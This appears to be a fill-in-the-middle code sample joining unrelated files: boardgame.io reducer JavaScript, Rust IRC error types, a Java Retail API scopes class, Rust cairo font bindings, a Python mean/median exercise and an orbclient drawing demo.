numMoves,
_activePlayersNumMoves,
},
};
if (_activePlayersMoveLimit &&
_activePlayersNumMoves[playerID] >= _activePlayersMoveLimit[playerID]) {
state = EndStage(state, { playerID, automatic: true });
}
const phaseConfig = GetPhase(ctx);
const G = phaseConfig.turn.wrapped.onMove(state);
state = { ...state, G };
const events = [{ fn: OnMove }];
return Process(state, events);
}
function SetStageEvent(state, playerID, arg) {
return Process(state, [{ fn: EndStage, arg, playerID }]);
}
function EndStageEvent(state, playerID) {
return Process(state, [{ fn: EndStage, playerID }]);
}
function SetPhaseEvent(state, _playerID, newPhase) {
return Process(state, [
{
fn: EndPhase,
phase: state.ctx.phase,
turn: state.ctx.turn,
arg: { next: newPhase },
},
]);
}
function EndPhaseEvent(state) {
return Process(state, [
{ fn: EndPhase, phase: state.ctx.phase, turn: state.ctx.turn },
]);
}
function EndTurnEvent(state, _playerID, arg) {
return Process(state, [
{ fn: EndTurn, turn: state.ctx.turn, phase: state.ctx.phase, arg },
]);
}
function PassEvent(state, _playerID, arg) {
return Process(state, [
{
fn: EndTurn,
turn: state.ctx.turn,
phase: state.ctx.phase,
force: true,
arg,
},
]);
}
function EndGameEvent(state, _playerID, arg) {
return Process(state, [
{ fn: EndGame, turn: state.ctx.turn, phase: state.ctx.phase, arg },
]);
}
const eventHandlers = {
endStage: EndStageEvent,
setStage: SetStageEvent,
endTurn: EndTurnEvent,
pass: PassEvent,
endPhase: EndPhaseEvent,
setPhase: SetPhaseEvent,
endGame: EndGameEvent,
setActivePlayers: SetActivePlayersEvent,
};
const enabledEventNames = [];
if (events.endTurn !== false) {
enabledEventNames.push('endTurn');
}
if (events.pass !== false) {
enabledEventNames.push('pass');
}
if (events.endPhase !== false) {
enabledEventNames.push('endPhase');
}
if (events.setPhase !== false) {
enabledEventNames.push('setPhase');
}
if (events.endGame !== false) {
enabledEventNames.push('endGame');
}
if (events.setActivePlayers !== false) {
enabledEventNames.push('setActivePlayers');
}
if (events.endStage !== false) {
enabledEventNames.push('endStage');
}
if (events.setStage !== false) {
enabledEventNames.push('setStage');
}
function ProcessEvent(state, action) {
const { type, playerID, args } = action.payload;
if (typeof eventHandlers[type] !== 'function')
return state;
return eventHandlers[type](state, playerID, ...(Array.isArray(args) ? args : [args]));
}
function IsPlayerActive(_G, ctx, playerID) {
if (ctx.activePlayers) {
return playerID in ctx.activePlayers;
}
return ctx.currentPlayer === playerID;
}
return {
ctx: (numPlayers) => ({
numPlayers,
turn: 0,
currentPlayer: '0',
playOrder: [...Array.from({ length: numPlayers })].map((_, i) => i + ''),
playOrderPos: 0,
phase: startingPhase,
activePlayers: null,
}),
init: (state) => {
return Process(state, [{ fn: StartGame }]);
},
isPlayerActive: IsPlayerActive,
eventHandlers,
eventNames: Object.keys(eventHandlers),
enabledEventNames,
moveMap,
moveNames: [...moveNames.values()],
processMove: ProcessMove,
processEvent: ProcessEvent,
getMove: GetMove,
};
}
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
function IsProcessed(game) {
return game.processMove !== undefined;
}
/**
* Helper to generate the game move reducer. The returned
* reducer has the following signature:
*
* (G, action, ctx) => {}
*
* You can roll your own if you like, or use any Redux
* addon to generate such a reducer.
*
* The convention used in this framework is to
* have action.type contain the name of the move, and
* action.args contain any additional arguments as an
* Array.
*/
function ProcessGameConfig(game) {
// The Game() function has already been called on this
// config object, so just pass it through.
if (IsProcessed(game)) {
return game;
}
if (game.name === undefined)
game.name = 'default';
if (game.deltaState === undefined)
game.deltaState = false;
if (game.disableUndo === undefined)
game.disableUndo = false;
if (game.setup === undefined)
game.setup = () => ({});
if (game.moves === undefined)
game.moves = {};
if (game.playerView === undefined)
game.playerView = (G) => G;
if (game.plugins === undefined)
game.plugins = [];
game.plugins.forEach((plugin) => {
if (plugin.name === undefined) {
throw new Error('Plugin missing name attribute');
}
if (plugin.name.includes(' ')) {
throw new Error(plugin.name + ': Plugin name must not include spaces');
}
});
if (game.name.includes(' ')) {
throw new Error(game.name + ': Game name must not include spaces');
}
const flow = Flow(game);
return {
...game,
flow,
moveNames: flow.moveNames,
pluginNames: game.plugins.map((p) => p.name),
processMove: (state, action) => {
let moveFn = flow.getMove(state.ctx, action.type, action.playerID);
if (IsLongFormMove(moveFn)) {
moveFn = moveFn.move;
}
if (moveFn instanceof Function) {
const fn = FnWrap(moveFn, game.plugins);
const ctxWithAPI = {
...EnhanceCtx(state),
playerID: action.playerID,
};
let args = [];
if (action.args !== undefined) {
args = Array.isArray(action.args) ? action.args : [action.args];
}
return fn(state.G, ctxWithAPI, ...args);
}
error(`invalid move object: ${action.type}`);
return state.G;
},
};
}
function IsLongFormMove(move) {
return move instanceof Object && move.move !== undefined;
}
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
var UpdateErrorType;
(function (UpdateErrorType) {
// The action’s credentials were missing or invalid
UpdateErrorType["UnauthorizedAction"] = "update/unauthorized_action";
// The action’s matchID was not found
UpdateErrorType["MatchNotFound"] = "update/match_not_found";
// Could not apply Patch operation (rfc6902).
UpdateErrorType["PatchFailed"] = "update/patch_failed";
})(UpdateErrorType || (UpdateErrorType = {}));
var ActionErrorType;
(function (ActionErrorType) {
// The action contained a stale state ID
ActionErrorType["StaleStateId"] = "action/stale_state_id";
// The requested move is unknown or not currently available
ActionErrorType["UnavailableMove"] = "action/unavailable_move";
// The move declared it was invalid (INVALID_MOVE constant)
ActionErrorType["InvalidMove"] = "action/invalid_move";
// The player making the action is not currently active
ActionErrorType["InactivePlayer"] = "action/inactive_player";
// The game has finished
ActionErrorType["GameOver"] = "action/gameover";
// The requested action is disabled (e.g. undo/redo, events)
ActionErrorType["ActionDisabled"] = "action/action_disabled";
// The requested action is not currently possible
ActionErrorType["ActionInvalid"] = "action/action_invalid";
// The requested action was declared invalid by a plugin
ActionErrorType["PluginActionInvalid"] = "action/plugin_invalid";
})(ActionErrorType || (ActionErrorType = {}));
/*
* Copyright 2017 The boardgame.io Authors
*
* Use of this source code is governed by a MIT-style
* license that can be found in the LICENSE file or at
* https://opensource.org/licenses/MIT.
*/
/**
* Check if the payload for the passed action contains a playerID.
*/
const actionHasPlayerID = (action) => action.payload.playerID !== null && action.payload.playerID !== undefined;
/**
* Returns true if a move can be undone.
*/
const CanUndoMove = (G, ctx, move) => {
function HasUndoable(move) {
return move.undoable !== undefined;
}
function IsFunction(undoable) {
return undoable instanceof Function;
}
if (!HasUndoable(move)) {
return true;
}
if (IsFunction(move.undoable)) {
return move.undoable(G, ctx);
}
return move.undoable;
};
/**
* Update the undo and redo stacks for a move or event.
*/
function updateUndoRedoState(state, opts) {
if (opts.game.disableUndo)
return state;
const undoEntry = {
G: state.G,
ctx: state.ctx,
plugins: state.plugins,
playerID: opts.action.payload.playerID || state.ctx.currentPlayer,
};
if (opts.action.type === 'MAKE_MOVE') {
undoEntry.moveType = opts.action.payload.type;
}
return {
...state,
_undo: [...state._undo, undoEntry],
// Always reset redo stack when making a move or event
_redo: [],
};
}
/**
* Process state, adding the initial deltalog for this action.
*/
function initializeDeltalog(state, action, move) {
// Create a log entry for this action.
const logEntry = {
action,
_stateID: state._stateID,
turn: state.ctx.turn,
phase: state.ctx.phase,
};
const pluginLogMetadata = state.plugins.log.data.metadata;
if (pluginLogMetadata !== undefined) {
logEntry.metadata = pluginLogMetadata;
}
if (typeof move === 'object' && move.redact === true) {
logEntry.redact = true;
}
return {
...state,
deltalog: [logEntry],
};
}
/**
* Update plugin state after move/event & check if plugins consider the action to be valid.
* @param state Current version of state in the reducer.
* @param oldState State to revert to in case of error.
* @param pluginOpts Plugin configuration options.
* @returns Tuple of the new state updated after flushing plugins and the old
* state augmented with an error if a plugin declared the action invalid.
*/
<|fim▁hole|> const [newState, isInvalid] = FlushAndValidate(state, pluginOpts);
if (!isInvalid)
return [newState];
return [
newState,
WithError(oldState, ActionErrorType.PluginActionInvalid, isInvalid),
];
}
/**
* ExtractTransientsFromState
*
* Split out transients from the a TransientState
*/
function ExtractTransients(transientState) {
if (!transientState) {
// We preserve null for the state for legacy callers, but the transient
// field should be undefined if not present to be consistent with the
// code path below.
return [null, undefined];
}
const { transients, ...state } = transientState;
return [state, transients];
}
/**
* WithError
*
* Augment a State instance with transient error information.
*/
function WithError(state, errorType, payload) {
const error = {
type: errorType,
payload,
};
return {
...state,
transients: {
error,
},
};
}
/**
* Middleware for processing TransientState associated with the reducer
* returned by CreateGameReducer.
* This should pretty much be used everywhere you want realistic state
* transitions and error handling.
*/
const TransientHandlingMiddleware = (store) => (next) => (action) => {
const result = next(action);
switch (action.type) {
case STRIP_TRANSIENTS: {
return result;
}
default: {
const [, transients] = ExtractTransients(store.getState());
if (typeof transients !== 'undefined') {
store.dispatch(stripTransients());
// Dev Note: If parent middleware needs to correlate the spawned
// StripTransients action to the triggering action, instrument here.
//
// This is a bit tricky; for more details, see:
// https://github.com/boardgameio/boardgame.io/pull/940#discussion_r636200648
return {
...result,
transients,
};
}
return result;
}
}
};
/**
* CreateGameReducer
*
* Creates the main game state reducer.
*/
function CreateGameReducer({ game, isClient, }) {
game = ProcessGameConfig(game);
/**
* GameReducer
*
* Redux reducer that maintains the overall game state.
* @param {object} state - The state before the action.
* @param {object} action - A Redux action.
*/
return (stateWithTransients = null, action) => {
let [state /*, transients */] = ExtractTransients(stateWithTransients);
switch (action.type) {
case STRIP_TRANSIENTS: {
// This action indicates that transient metadata in the state has been
// consumed and should now be stripped from the state..
return state;
}
case GAME_EVENT: {
state = { ...state, deltalog: [] };
// Process game events only on the server.
// These events like `endTurn` typically
// contain code that may rely on secret state
// and cannot be computed on the client.
if (isClient) {
return state;
}
// Disallow events once the game is over.
if (state.ctx.gameover !== undefined) {
error(`cannot call event after game end`);
return WithError(state, ActionErrorType.GameOver);
}
// Ignore the event if the player isn't active.
if (actionHasPlayerID(action) &&
!game.flow.isPlayerActive(state.G, state.ctx, action.payload.playerID)) {
error(`disallowed event: ${action.payload.type}`);
return WithError(state, ActionErrorType.InactivePlayer);
}
// Execute plugins.
state = Enhance(state, {
game,
isClient: false,
playerID: action.payload.playerID,
});
// Process event.
let newState = game.flow.processEvent(state, action);
// Execute plugins.
let stateWithError;
[newState, stateWithError] = flushAndValidatePlugins(newState, state, {
game,
isClient: false,
});
if (stateWithError)
return stateWithError;
// Update undo / redo state.
newState = updateUndoRedoState(newState, { game, action });
return { ...newState, _stateID: state._stateID + 1 };
}
case MAKE_MOVE: {
const oldState = (state = { ...state, deltalog: [] });
// Check whether the move is allowed at this time.
const move = game.flow.getMove(state.ctx, action.payload.type, action.payload.playerID || state.ctx.currentPlayer);
if (move === null) {
error(`disallowed move: ${action.payload.type}`);
return WithError(state, ActionErrorType.UnavailableMove);
}
// Don't run move on client if move says so.
if (isClient && move.client === false) {
return state;
}
// Disallow moves once the game is over.
if (state.ctx.gameover !== undefined) {
error(`cannot make move after game end`);
return WithError(state, ActionErrorType.GameOver);
}
// Ignore the move if the player isn't active.
if (actionHasPlayerID(action) &&
!game.flow.isPlayerActive(state.G, state.ctx, action.payload.playerID)) {
error(`disallowed move: ${action.payload.type}`);
return WithError(state, ActionErrorType.InactivePlayer);
}
// Execute plugins.
state = Enhance(state, {
game,
isClient,
playerID: action.payload.playerID,
});
// Process the move.
const G = game.processMove(state, action.payload);
// The game declared the move as invalid.
if (G === INVALID_MOVE) {
error(`invalid move: ${action.payload.type} args: ${action.payload.args}`);
// TODO(#723): Marshal a nice error payload with the processed move.
return WithError(state, ActionErrorType.InvalidMove);
}
const newState = { ...state, G };
// Some plugin indicated that it is not suitable to be
// materialized on the client (and must wait for the server
// response instead).
if (isClient && NoClient(newState, { game })) {
return state;
}
state = newState;
// If we're on the client, just process the move
// and no triggers in multiplayer mode.
// These will be processed on the server, which
// will send back a state update.
if (isClient) {
let stateWithError;
[state, stateWithError] = flushAndValidatePlugins(state, oldState, {
game,
isClient: true,
});
if (stateWithError)
return stateWithError;
return {
...state,
_stateID: state._stateID + 1,
};
}
// On the server, construct the deltalog.
state = initializeDeltalog(state, action, move);
// Allow the flow reducer to process any triggers that happen after moves.
state = game.flow.processMove(state, action.payload);
let stateWithError;
[state, stateWithError] = flushAndValidatePlugins(state, oldState, {
game,
});
if (stateWithError)
return stateWithError;
// Update undo / redo state.
state = updateUndoRedoState(state, { game, action });
return {
...state,
_stateID: state._stateID + 1,
};
}
case RESET:
case UPDATE:
case SYNC: {
return action.state;
}
case UNDO: {
state = { ...state, deltalog: [] };
if (game.disableUndo) {
error('Undo is not enabled');
return WithError(state, ActionErrorType.ActionDisabled);
}
const { G, ctx, _undo, _redo, _stateID } = state;
if (_undo.length < 2) {
error(`No moves to undo`);
return WithError(state, ActionErrorType.ActionInvalid);
}
const last = _undo[_undo.length - 1];
const restore = _undo[_undo.length - 2];
// Only allow players to undo their own moves.
if (actionHasPlayerID(action) &&
action.payload.playerID !== last.playerID) {
error(`Cannot undo other players' moves`);
return WithError(state, ActionErrorType.ActionInvalid);
}
// If undoing a move, check it is undoable.
if (last.moveType) {
const lastMove = game.flow.getMove(restore.ctx, last.moveType, last.playerID);
if (!CanUndoMove(G, ctx, lastMove)) {
error(`Move cannot be undone`);
return WithError(state, ActionErrorType.ActionInvalid);
}
}
state = initializeDeltalog(state, action);
return {
...state,
G: restore.G,
ctx: restore.ctx,
plugins: restore.plugins,
_stateID: _stateID + 1,
_undo: _undo.slice(0, -1),
_redo: [last, ..._redo],
};
}
case REDO: {
state = { ...state, deltalog: [] };
if (game.disableUndo) {
error('Redo is not enabled');
return WithError(state, ActionErrorType.ActionDisabled);
}
const { _undo, _redo, _stateID } = state;
if (_redo.length === 0) {
error(`No moves to redo`);
return WithError(state, ActionErrorType.ActionInvalid);
}
const first = _redo[0];
// Only allow players to redo their own undos.
if (actionHasPlayerID(action) &&
action.payload.playerID !== first.playerID) {
error(`Cannot redo other players' moves`);
return WithError(state, ActionErrorType.ActionInvalid);
}
state = initializeDeltalog(state, action);
return {
...state,
G: first.G,
ctx: first.ctx,
plugins: first.plugins,
_stateID: _stateID + 1,
_undo: [..._undo, first],
_redo: _redo.slice(1),
};
}
case PLUGIN: {
// TODO(#723): Expose error semantics to plugin processing.
return ProcessAction(state, action, { game });
}
case PATCH: {
const oldState = state;
const newState = JSON.parse(JSON.stringify(oldState));
const patchError = applyPatch(newState, action.patch);
const hasError = patchError.some((entry) => entry !== null);
if (hasError) {
error(`Patch ${JSON.stringify(action.patch)} apply failed`);
return WithError(oldState, UpdateErrorType.PatchFailed, patchError);
}
else {
return newState;
}
}
default: {
return state;
}
}
};
}
export { CreateGameReducer as C, IsLongFormMove as I, ProcessGameConfig as P, TransientHandlingMiddleware as T };<|fim▁end|>
|
function flushAndValidatePlugins(state, oldState, pluginOpts) {
|
<|file_name|>error.rs<|end_file_name|><|fim▁begin|>//! IRC protocol errors using `failure`.
use thiserror::Error;
/// A `Result` type for IRC `ProtocolErrors`.
pub type Result<T, E = ProtocolError> = ::std::result::Result<T, E>;
/// An IRC protocol error.
#[derive(Debug, Error)]
pub enum ProtocolError {
/// An internal I/O error.
#[error("an io error occurred")]
Io(#[source] std::io::Error),
/// Error for invalid messages.
#[error("invalid message: {}", string)]
InvalidMessage {
/// The string that failed to parse.
string: String,
/// The detailed message parsing error.
#[source]
cause: MessageParseError,
},
}
impl From<std::io::Error> for ProtocolError {
fn from(e: std::io::Error) -> ProtocolError {
ProtocolError::Io(e)
}
}
/// Errors that occur when parsing messages.
#[derive(Debug, Error)]
pub enum MessageParseError {
/// The message was empty.
#[error("empty message")]
EmptyMessage,
/// The command was invalid (i.e. missing).
#[error("invalid command")]
InvalidCommand,
/// The mode string was malformed.
#[error("invalid mode string: {}", string)]
InvalidModeString {
/// The invalid mode string.
string: String,
/// The detailed mode parsing error.
#[source]
cause: ModeParseError,
},
/// The subcommand used was invalid.
#[error("invalid {} subcommand: {}", cmd, sub)]
InvalidSubcommand {
/// The command whose invalid subcommand was referenced.
cmd: &'static str,
/// The invalid subcommand.
sub: String,
},
}
/// Errors that occur while parsing mode strings.
#[derive(Debug, Error)]
pub enum ModeParseError {
/// Invalid modifier used in a mode string (only + and - are valid).
#[error("invalid mode modifier: {}", modifier)]
InvalidModeModifier {
/// The invalid mode modifier.
modifier: char,
},<|fim▁hole|> /// Missing modifier used in a mode string.
#[error("missing mode modifier")]
MissingModeModifier,
}<|fim▁end|>
| |
<|file_name|>CloudRetailScopes.java<|end_file_name|><|fim▁begin|>/*<|fim▁hole|> * in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.retail.v2;
/**
* Available OAuth 2.0 scopes for use with the Retail API.
*
* @since 1.4
*/
public class CloudRetailScopes {
/** See, edit, configure, and delete your Google Cloud data and see the email address for your Google Account.. */
public static final String CLOUD_PLATFORM = "https://www.googleapis.com/auth/cloud-platform";
/**
* Returns an unmodifiable set that contains all scopes declared by this class.
*
* @since 1.16
*/
public static java.util.Set<String> all() {
java.util.Set<String> set = new java.util.HashSet<String>();
set.add(CLOUD_PLATFORM);
return java.util.Collections.unmodifiableSet(set);
}
private CloudRetailScopes() {
}
}<|fim▁end|>
|
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
|
<|file_name|>fonts.rs<|end_file_name|><|fim▁begin|>// Copyright 2013-2015, The Gtk-rs Project Developers.
// See the COPYRIGHT file at the top-level directory of this distribution.
// Licensed under the MIT license, see the LICENSE file or <http://opensource.org/licenses/MIT>
use glib::translate::*;
use std::clone::Clone;
use std::cmp::PartialEq;
use std::ops::Drop;
use ffi;
use ffi::enums::{
Antialias,
SubpixelOrder,
HintStyle,
HintMetrics,
FontType,
FontWeight,
FontSlant,
};
use ::matrices::Matrix;
use ffi::{
cairo_font_options_t,
cairo_font_face_t,
cairo_scaled_font_t
};
pub use ffi::{
FontExtents,
Glyph,
TextCluster,
TextExtents
};
/* TODO
Allocates an array of cairo_glyph_t's. This function is only useful in
implementations of cairo_user_scaled_font_text_to_glyphs_func_t where the user
needs to allocate an array of glyphs that cairo will free. For all other uses,
user can use their own allocation method for glyphs.
impl Glyph {
//pub fn cairo_glyph_allocate(num_glyphs: c_int) -> *Glyph;
//pub fn cairo_glyph_free(glyphs: *Glyph);
}
Allocates an array of cairo_glyph_t's. This function is only useful in
implementations of cairo_user_scaled_font_text_to_glyphs_func_t where the user
needs to allocate an array of glyphs that cairo will free. For all other uses,
user can use their own allocation method for glyphs.
impl TextCluster {
//pub fn cairo_text_cluster_allocate(num_clusters: c_int) -> *TextCluster;
//pub fn cairo_text_cluster_free(clusters: *TextCluster);
}
*/
pub struct FontOptions(*mut cairo_font_options_t);
impl FontOptions {
pub fn new() -> FontOptions {
let font_options = unsafe {
FontOptions(ffi::cairo_font_options_create())
};
font_options.ensure_status();
font_options
}
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_font_options_t {
let FontOptions(ptr) = *self;
ptr
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_font_options_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn merge(&mut self, other: &mut FontOptions) {
unsafe {
ffi::cairo_font_options_merge(self.get_ptr(), other.get_ptr())
}
}
pub fn hash(&self) -> u64{
unsafe {
ffi::cairo_font_options_hash(self.get_ptr()) as u64
}
}
pub fn set_antialias(&self, antialias: Antialias) {
unsafe {
ffi::cairo_font_options_set_antialias(self.get_ptr(), antialias)
}
}
pub fn get_antialias(&self) -> Antialias {
unsafe {
ffi::cairo_font_options_get_antialias(self.get_ptr())
}
}
pub fn set_subpixel_order(&self, order: SubpixelOrder) {
unsafe {
ffi::cairo_font_options_set_subpixel_order(self.get_ptr(), order)
}
}
pub fn get_subpixel_order(&self) -> SubpixelOrder {
unsafe {
ffi::cairo_font_options_get_subpixel_order(self.get_ptr())
}
}
pub fn set_hint_style(&self, hint_style: HintStyle) {
unsafe {
ffi::cairo_font_options_set_hint_style(self.get_ptr(), hint_style)
}
}
pub fn get_hint_style(&self) -> HintStyle {
unsafe {
ffi::cairo_font_options_get_hint_style(self.get_ptr())
}
}
pub fn set_hint_metrics(&self, hint_metrics: HintMetrics) {
unsafe {
ffi::cairo_font_options_set_hint_metrics(self.get_ptr(), hint_metrics)
}
}
pub fn get_hint_metrics(&self) -> HintMetrics {
unsafe {
ffi::cairo_font_options_get_hint_metrics(self.get_ptr())
}
}
}
impl PartialEq for FontOptions {
fn eq(&self, other: &FontOptions) -> bool {
unsafe {
ffi::cairo_font_options_equal(self.get_ptr(), other.get_ptr()).as_bool()
}
}
}
<|fim▁hole|> unsafe {
FontOptions(ffi::cairo_font_options_copy(self.get_ptr()))
}
}
}
impl Drop for FontOptions {
fn drop(&mut self) {
unsafe {
ffi::cairo_font_options_destroy(self.get_ptr())
}
}
}
pub struct FontFace(pub *mut cairo_font_face_t);
impl FontFace {
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_font_face_t {
let FontFace(ptr) = *self;
ptr
}
pub fn toy_create(family: &str, slant: FontSlant, weight: FontWeight) -> FontFace {
let font_face = FontFace(
unsafe {
ffi::cairo_toy_font_face_create(family.to_glib_none().0, slant, weight)
}
);
font_face.ensure_status();
font_face
}
pub fn toy_get_family(&self) -> Option<String> {
unsafe {
from_glib_none(ffi::cairo_toy_font_face_get_family(self.get_ptr()))
}
}
pub fn toy_get_slant(&self) -> FontSlant {
unsafe {
ffi::cairo_toy_font_face_get_slant(self.get_ptr())
}
}
pub fn toy_get_weight(&self) -> FontWeight {
unsafe {
ffi::cairo_toy_font_face_get_weight(self.get_ptr())
}
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_font_face_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn get_type(&self) -> FontType {
unsafe {
ffi::cairo_font_face_get_type(self.get_ptr())
}
}
pub fn get_reference_count(&self) -> usize {
unsafe {
ffi::cairo_font_face_get_reference_count(self.get_ptr()) as usize
}
}
pub fn reference(&self) -> FontFace {
unsafe {
FontFace(ffi::cairo_font_face_reference(self.get_ptr()))
}
}
}
impl Drop for FontFace {
fn drop(&mut self) {
unsafe {
ffi::cairo_font_face_destroy(self.get_ptr())
}
}
}
pub struct ScaledFont(pub *mut cairo_scaled_font_t);
impl ScaledFont {
#[doc(hidden)]
pub fn get_ptr(&self) -> *mut cairo_scaled_font_t {
let ScaledFont(ptr) = *self;
ptr
}
pub fn new(font_face: FontFace, font_matrix: &mut Matrix, ctm: &mut Matrix, options: FontOptions) -> ScaledFont {
let scaled_font = unsafe {
ScaledFont(ffi::cairo_scaled_font_create(font_face.get_ptr(), font_matrix, ctm, options.get_ptr()))
};
scaled_font.ensure_status();
scaled_font
}
pub fn ensure_status(&self) {
let status = unsafe {
ffi::cairo_scaled_font_status(self.get_ptr())
};
status.ensure_valid()
}
pub fn get_type(&self) -> FontType {
unsafe {
ffi::cairo_scaled_font_get_type(self.get_ptr())
}
}
pub fn get_reference_count(&self) -> usize {
unsafe {
ffi::cairo_scaled_font_get_reference_count(self.get_ptr()) as usize
}
}
//pub fn cairo_scaled_font_extents(scaled_font: *mut cairo_scaled_font_t, extents: *mut cairo_font_extents_t);
// cairo_text_extents_t;
//pub fn cairo_scaled_font_text_extents(scaled_font: *mut cairo_scaled_font_t, utf8: *mut char, extents: *mut cairo_text_extents_t);
//pub fn cairo_scaled_font_glyph_extents(scaled_font: *mut cairo_scaled_font_t, glyphs: *mut Glyph, num_glyphs: c_int, extents: *mut cairo_text_extents_t);
//pub fn cairo_scaled_font_text_to_glyphs(scaled_font: *mut cairo_scaled_font_t, x: c_double, y: c_double, utf8: *mut char, utf8_len: c_int, glyphs: **mut Glyph, num_glyphs: *mut c_int, clusters: **mut TextCluster, num_clusters: *mut c_int, cluster_flags: *mut TextClusterFlags) -> Status;
//pub fn cairo_scaled_font_get_font_face(scaled_font: *mut cairo_scaled_font_t) -> *mut cairo_font_face_t;
//pub fn cairo_scaled_font_get_font_options(scaled_font: *mut cairo_scaled_font_t, options: *mut cairo_font_options_t);
//pub fn cairo_scaled_font_get_font_matrix(scaled_font: *mut cairo_scaled_font_t, font_matrix: *mut cairo_matrix_t);
//pub fn cairo_scaled_font_get_ctm(scaled_font: *mut cairo_scaled_font_t, ctm: *mut cairo_matrix_t);
//pub fn cairo_scaled_font_get_scale_matrix(scaled_font: *mut cairo_scaled_font_t, scale_matrix: *cairo_matrix_t);
pub fn reference(&self) -> ScaledFont {
unsafe {
ScaledFont(ffi::cairo_scaled_font_reference(self.get_ptr()))
}
}
}
impl Drop for ScaledFont {
fn drop(&mut self) {
unsafe {
ffi::cairo_scaled_font_destroy(self.get_ptr())
}
}
}<|fim▁end|>
|
impl Clone for FontOptions {
fn clone(&self) -> FontOptions {
|
<|file_name|>1379.py<|end_file_name|><|fim▁begin|>"""
The mean of three integers A, B and C is (A + B + C)/3. The median of three integers is the one that would be in the
middle if they are sorted in non-decreasing order. Given two integers A and B, return the minimum possible integer C
such that the mean and the median of A, B and C are equal.
Input
Each test case is given in a single line that contains two integers A and B (1 ≤ A ≤ B ≤ 109). The last test case is
followed by a line containing two zeros.
Output
For each test case output one line containing the minimum possible integer C such that the mean and the median of A, B
and C are equal.
"""
A = int
B = int
C = int
while B != 0 and C != 0:<|fim▁hole|>
B, C = map(int, input().split())
if 1 <= B <= C <= 10 ** 9:
A = 2 * B - C
print(A)<|fim▁end|>
| |
<|file_name|>simple.rs<|end_file_name|><|fim▁begin|>// SPDX-License-Identifier: MIT
use orbclient::{Color, EventOption, GraphicsPath, Mode, Renderer, Window};
fn main() {
let (width, height) = orbclient::get_display_size().unwrap();
let mut window = Window::new(
(width as i32) / 4,
(height as i32) / 4,
width / 2,
height / 2,
"TITLE",
)
.unwrap();
let (win_w, win_h) = (width / 2, height / 2);
// top left -> bottom rigth
window.linear_gradient(
0,
0,
win_w / 3,
win_h,
0,
0,
(win_w / 3) as i32,
(win_h / 2) as i32,
Color::rgb(128, 128, 128),
Color::rgb(255, 255, 255),
);
// horizontal gradient
window.linear_gradient(
(win_w / 3) as i32,
0,
win_w / 3,
win_h,
(win_w / 3) as i32,
0,
(2 * win_w / 3) as i32,
0,
Color::rgb(128, 255, 255),
Color::rgb(255, 255, 255),
);
// vertical gradient
window.linear_gradient(
(2 * win_w / 3) as i32,
0,
win_w / 3,
win_h,
(2 * win_w / 3) as i32,
0,
(2 * win_w / 3) as i32,
win_h as i32,
Color::rgb(0, 128, 0),
Color::rgb(255, 255, 255),
);
window.arc(100, 100, -25, 1 << 0 | 1 << 2, Color::rgb(0, 0, 255));
window.arc(100, 100, -25, 1 << 1 | 1 << 3, Color::rgb(0, 255, 255));
window.arc(100, 100, -25, 1 << 4 | 1 << 6, Color::rgb(255, 0, 255));
window.arc(100, 100, -25, 1 << 5 | 1 << 7, Color::rgb(255, 255, 0));
window.circle(100, 100, 25, Color::rgb(0, 0, 0));
window.circle(100, 101, -25, Color::rgb(0, 255, 0));
window.circle(220, 220, -100, Color::rgba(128, 128, 128, 80));
window.wu_circle(150, 220, 100, Color::rgba(255, 0, 0, 255));
window.line(0, 0, 200, 200, Color::rgb(255, 0, 0));
window.line(0, 200, 200, 0, Color::rgb(128, 255, 0));
// vertical and horizontal line test
window.line(100, 0, 100, 200, Color::rgb(0, 0, 255));
window.line(0, 100, 200, 100, Color::rgb(255, 255, 0));
window.wu_line(100, 220, 400, 250, Color::rgba(255, 0, 0, 255));
window.line(100, 230, 400, 260, Color::rgba(255, 0, 0, 255));
// path and bezier curve example draw a cloud
let mut cloud_path = GraphicsPath::new();
cloud_path.move_to(170, 80);
cloud_path.bezier_curve_to(130, 100, 130, 150, 230, 150);
cloud_path.bezier_curve_to(250, 180, 320, 180, 340, 150);
cloud_path.bezier_curve_to(420, 150, 420, 120, 390, 100);
cloud_path.bezier_curve_to(430, 40, 370, 30, 340, 50);
cloud_path.bezier_curve_to(320, 5, 250, 20, 250, 50);
cloud_path.bezier_curve_to(200, 5, 150, 20, 170, 80);
window.draw_path_stroke(cloud_path, Color::rgb(0, 0, 255));
// path and quadratic curve example draw a balloon
let mut balloon_path = GraphicsPath::new();
balloon_path.move_to(75, 25);
balloon_path.quadratic_curve_to(25, 25, 25, 62);
balloon_path.quadratic_curve_to(25, 100, 50, 100);
balloon_path.quadratic_curve_to(50, 120, 30, 125);
balloon_path.quadratic_curve_to(60, 120, 65, 100);
balloon_path.quadratic_curve_to(125, 100, 125, 62);
balloon_path.quadratic_curve_to(125, 25, 75, 25);
window.draw_path_stroke(balloon_path, Color::rgb(0, 0, 255));
window.char(200, 200, '═', Color::rgb(0, 0, 0));
window.char(208, 200, '═', Color::rgb(0, 0, 0));
// testing for non existent x,y position : does not panic but returns Color(0,0,0,0)
let _non_existent_pixel = window.getpixel(width as i32 + 10, height as i32 + 10);
// testing PartialEq for Color
if Color::rgb(11, 2, 3) == Color::rgba(1, 2, 3, 100) {
println!("Testing colors: they are the same!")
} else {
println!("Testing colors: they are NOT the same!")
}<|fim▁hole|>
//Draw a transparent rectangle over window content
// default mode is Blend
window.rect(250, 200, 80, 80, Color::rgba(100, 100, 100, 100));
//Draw an opaque rectangle replacing window content
window.mode().set(Mode::Overwrite); // set window drawing mode to Overwrite from now on
window.rect(300, 220, 80, 80, Color::rgb(100, 100, 100));
